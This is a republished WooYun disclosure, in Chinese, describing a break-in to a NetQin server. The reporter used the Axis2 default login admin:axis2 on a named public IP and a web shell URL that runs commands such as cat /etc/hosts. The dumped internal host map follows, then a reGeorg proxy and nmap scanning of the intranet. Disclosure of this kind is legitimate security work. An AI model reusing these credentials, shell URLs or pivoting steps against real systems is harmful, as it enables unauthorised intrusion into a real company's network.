网秦某站弱口令导致的一次内网漫游

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-06-16: 细节已通知厂商并且等待厂商处理中
2016-06-16: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

厂商给rank不要那么吝啬嘛 -,-

详细说明:

纯属偶遇,由Axis2的弱口令导致getshell,然后内网漫游了一下



http://211.151.59.27:80/axis2/axis2-admin/login



admin:axis2



QQ20160615-2.png





漏洞证明:

getshell



http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts



QQ20160615-1.png





QQ20160615-0.png





通过hosts可以看到是网秦的服务



code 区域
HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014
# HEADER: by puppet. While it can still be managed manually, it
# HEADER: is definitely not recommended.
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost BJ-YZ-S-ST040
::1 localhost6.localdomain6 localhost6
127.0.0.1 oversea
192.168.3.46 bjyz.puppet.nq.com
192.168.0.41 a03 pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com
192.168.0.217 a12 app.netqin.com
211.151.59.71 a09 blyt.netqin.com
192.168.0.143 a08 i.netqin.com i.nq.com m.nq.com
192.168.5.212 a13 c.cpsserver.cns
192.168.0.148 a05 nqses.nq.com
192.168.3.35 a11 pay.netqin.com pay.nq.com
192.168.3.53 a07 my.netqin.com
192.168.3.52 a06 mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com
192.168.5.216 a15 dbapp.nq.com
192.168.5.207 a16 dbboss.nq.com
192.168.5.218 a14 dbuis.nq.com





QQ20160615-3.png





拿到shell了,reGeorg开个代理进内网



namp扫了一下内网网段,内网比较大



设计大量内部系统,wiki,jenkins,jira,内部管理系统,会议室预定系统,报表管理系统等等,以及大量开发测试文档



QQ20160615-6.png





QQ20160615-8.png



QQ20160615-10.png



QQ20160615-11.png





QQ20160615-12.png



QQ20160615-13.png



QQ20160615-14.png



QQ20160615-15.png



程序员千行bug率....

QQ20160615-16.png





jenkins 又可以搞下好多机器了

QQ20160615-17.png





QQ20160615-19.png



QQ20160615-20.png



QQ20160615-21.png



QQ20160615-22.png



可申请点卡..

QQ20160615-23.png



QQ20160615-24.png



QQ20160615-26.png



QQ20160615-27.png





不深入测试了

修复方案:

1.修复弱口令

2.删除shell,不排除之前有人进来过

3.加强内网安全

版权声明:转载请注明来源 niliu@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-21 09:10

厂商回复:

 

漏洞Rank:15 (WooYun评价)

最新状态:

2016-06-21:多谢提醒


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:网秦某站弱口令导致的一次内网漫游 - https://www.15qq.cn/wooyun/165.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知